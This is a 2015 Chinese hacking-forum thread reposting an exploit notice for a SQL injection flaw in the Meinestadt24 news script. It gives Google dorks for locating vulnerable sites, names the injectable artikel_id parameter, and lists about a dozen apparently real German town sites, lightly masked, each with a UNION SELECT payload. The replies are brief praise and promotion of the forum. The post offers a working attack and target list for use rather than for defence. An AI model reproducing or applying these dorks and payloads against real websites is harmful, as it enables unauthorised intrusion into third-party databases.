Meinestadt24注入漏洞

90_ · 发表于 2015-7-27 11:43:42

[PHP] 纯文本查看 复制代码

[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Exploit Title : Meinestadt24 SQL Injection Vulnerability
 
Exploit Author : Ashiyane Digital Security Team
 
Google Dork One : intext:© 2015 meinestadt24
Google Dork Two : inurl:nachrichten.php?artikel_id=
 
Date : 2015-7-25
 
Tested On : Windows Se7en
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Path Of Vulnerability :
 
[url]http://Target.de/nachrichten.php?artikel_id=-AnyNumber[/url] [SQLI]
 
* Reminder : Your Sqli Command Needs UrlEncode
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Demos :
 
[url]http://www.meiXgriesheim.de/nachrichten.php?artikel_id=-983722[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meiXeckarsulm.de/nachrichten.php?artikel_id=-990952[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meinXnsberg.de/nachrichten.php?artikel_id=-293312[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXberbach.de/nachrichten.php?artikel_id=-991321[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXschaffenburg.de/nachrichten.php?artikel_id=-74847[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXarmstadt.de/nachrichten.php?artikel_id=-996681[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXabenhausen.de/nachrichten.php?artikel_id=-992823[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.meXkarlsruhe.de/nachrichten.php?artikel_id=-88747[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.mein-Xchenzell.de/nachrichten.php?artikel_id=-46129[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.mXbebra.de/nachrichten.php?artikel_id=-981361[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
[url]http://www.mein-Xrsch.de/nachrichten.php?artikel_id=-987491[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
And many more ...

Sty，涛 · 发表于 2015-7-27 13:19:12

支持中国红客联盟(ihonker.org)

Sty，涛 · 发表于 2015-7-28 04:52:04

支持，看起来不错呢！

Lucifer · 发表于 2015-7-30 02:33:30

还是不错的哦，顶了

ruguoruo · 发表于 2015-7-30 07:59:31

感谢楼主的分享~

ljy07 · 发表于 2015-7-31 10:20:02

支持，看起来不错呢！

r00tc4 · 发表于 2015-7-31 16:21:31

wtsqq123 · 发表于 2015-7-31 17:13:01

支持中国红客联盟(ihonker.org)

Jack-5 · 发表于 2015-8-1 01:59:45

支持，看起来不错呢！

arctic · 发表于 2015-8-1 04:38:03

学习学习技术，加油！

Meinestadt24注入漏洞

指导单位

旗下站点

联系我们